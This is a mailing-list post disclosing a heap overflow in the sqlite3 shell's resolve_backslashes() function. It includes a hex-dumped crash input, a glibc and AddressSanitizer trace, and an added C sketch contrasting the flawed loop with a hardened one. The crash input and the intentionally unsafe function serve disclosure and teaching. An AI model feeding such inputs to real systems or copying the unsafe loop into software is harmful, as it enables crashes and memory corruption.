Dear Sqlite team, I hope this email finds you well.
I'd like to report a heap overflow; please find an advisory attached to this email.

Best regards,
j-
---------------------------------------------------------------------------
* * * Sqlite3 heap overflow vulnerability * * *
---------------------------------------------------------------------------

--[ Vulnerability summary:

Date reported to vendor: 27 May 2016
CVE : Not yet
Class: Heap overflow

--[ Synopsis:

A heap overflow has been identified in sqlite3.

Version tested : 3.8.9 2015-03-23 21:32:50 0ee2d38deb35aefc55395e86984a9a773caf6218

--[ Vulnerability details:

The resolve_backslashes() function is subject to a heap corruption vulnerability when parsing an allocated buffer looking for a backslash. The application starts by reading the corresponding value (possibly after the end of a valid heap chunk), and then replaces it, potentially leading to a heap corruption.

--[ Exploitability:

The vulnerability can consistently be triggered using the PoC reproduced below. Successful exploitation is heap allocator dependent.

--[ Timeline:

27 May 2016 : Vulnerability reported to vendor.

--[ PoC:

jbrossard@jbrossard-wsl3:~$ xxd /tmp/poc1/poc1.txt
0000000: 2e20 696e 0a2e 6920 697b 0a2e 696e 0a2e  . in..i i{..in..
0000010: 2078 1445 434c 5372 7328 aa6f 0000 036e   x.ECLSrs(.o...n
0000020: 0a2e 2078 1445 434c 5372 5c              .. x.ECLSr\
jbrossard@jbrossard-wsl3:~$

jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$ sqlite3 < /tmp/poc/poc1.txt
Error: unknown command or invalid arguments: "xECLSrs(�o.". Enter ".help" for help
*** glibc detected *** sqlite3: free(): invalid next size (fast): 0x000000000104bd50 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x7db26)[0x7f5e8bc0eb26]
sqlite3[0x40528a]
sqlite3[0x402709]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xed)[0x7f5e8bbb276d]
sqlite3[0x40299d]
======= Memory map: ========
Aborted (core dumped)

jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$ /home/jbrossard/lab/fuzzing/sqlite3/bin/sqlite3_afl32_asan < /tmp/poc/poc1.txt
Usage: .import FILE TABLE
=================================================================
==2443==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf30032ec at pc 0x806573c bp 0xffdd5d58 sp 0xffdd5d4c
READ of size 1 at 0xf30032ec thread T0
    #0 0x806573b in resolve_backslashes /home/jbrossard/lab/sqlite3/build/../src/shell.c:1946
    #1 0x8083183 in do_meta_command /home/jbrossard/lab/sqlite3/build/../src/shell.c:2614
    #2 0x80967a8 in process_input /home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
    #3 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
    #4 0xf70b74d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)
    #5 0x8065148 (/home/jbrossard/lab/fuzzing/sqlite3/bin/sqlite3_afl32_asan+0x8065148)

0xf30032ec is located 0 bytes to the right of 300-byte region [0xf30031c0,0xf30032ec)
allocated by thread T0 here:
    #0 0xf72b7654 in __interceptor_realloc ../../../../../libsanitizer/asan/asan_malloc_linux.cc:93
    #1 0x806c16b in local_getline /home/jbrossard/lab/sqlite3/build/../src/shell.c:451
    #2 0x8095a7c in one_input_line /home/jbrossard/lab/sqlite3/build/../src/shell.c:491
    #3 0x8095a7c in process_input /home/jbrossard/lab/sqlite3/build/../src/shell.c:4060
    #4 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
    #5 0xf70b74d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/jbrossard/lab/sqlite3/build/../src/shell.c:1946 resolve_backslashes
==2443==ABORTING
jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$
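As an added illustration (not code from this advisory or from SQLite's shell.c), a simplified model of the escape-resolver pattern the advisory describes, next to a hardened form that consumes a backslash only when a byte follows it; the function names, the helper and the inputs are constructed for this example.

```c
#include <stdlib.h>
#include <string.h>

/* Simplified model of the defect the advisory describes (not a copy of
 * sqlite's shell.c). When the line ends in a backslash, z[++i] consumes the
 * NUL terminator, so the next iteration reads z[i] one byte past the end of
 * the heap buffer and keeps copying heap bytes back through z[j] until it
 * finds a zero byte. Shown for contrast only; never call it on real input. */
void resolve_backslashes_unsafe(char *z){
  int i, j;
  char c;
  for(i=j=0; (c = z[i])!=0; i++, j++){
    if( c=='\\' ){
      c = z[++i];             /* trailing backslash: this is the NUL */
      if( c=='n' ) c = '\n';
      else if( c=='t' ) c = '\t';
    }
    z[j] = c;                 /* loop then reads z[i+1]: past the NUL */
  }
  if( j<i ) z[j] = 0;
}

/* Hardened form: a backslash is an escape only if a following byte exists;
 * a lone trailing backslash is kept literally and i never passes the NUL. */
void resolve_backslashes_safe(char *z){
  int i, j;
  char c;
  for(i=j=0; (c = z[i])!=0; i++, j++){
    if( c=='\\' && z[i+1]!=0 ){
      c = z[++i];
      if( c=='n' ) c = '\n';
      else if( c=='t' ) c = '\t';
    }
    z[j] = c;
  }
  if( j<i ) z[j] = 0;
}

/* Constructed helper: resolve a heap copy of `in` sized exactly to the string,
 * like a getline()-style line buffer, and report whether it equals `expect`. */
int safe_resolves_to(const char *in, const char *expect){
  size_t n = strlen(in);
  char *z = malloc(n + 1);
  if( !z ) return 0;
  memcpy(z, in, n + 1);
  resolve_backslashes_safe(z);
  int ok = strcmp(z, expect)==0;
  free(z);
  return ok;
}
```

Run the hardened resolver under AddressSanitizer with an exact-size allocation, as in the trace above, to confirm that a line ending in a single backslash no longer reads beyond the buffer.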
_______________________________________________ sqlite-users mailing list sqlite-users@mailinglists.sqlite.org http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users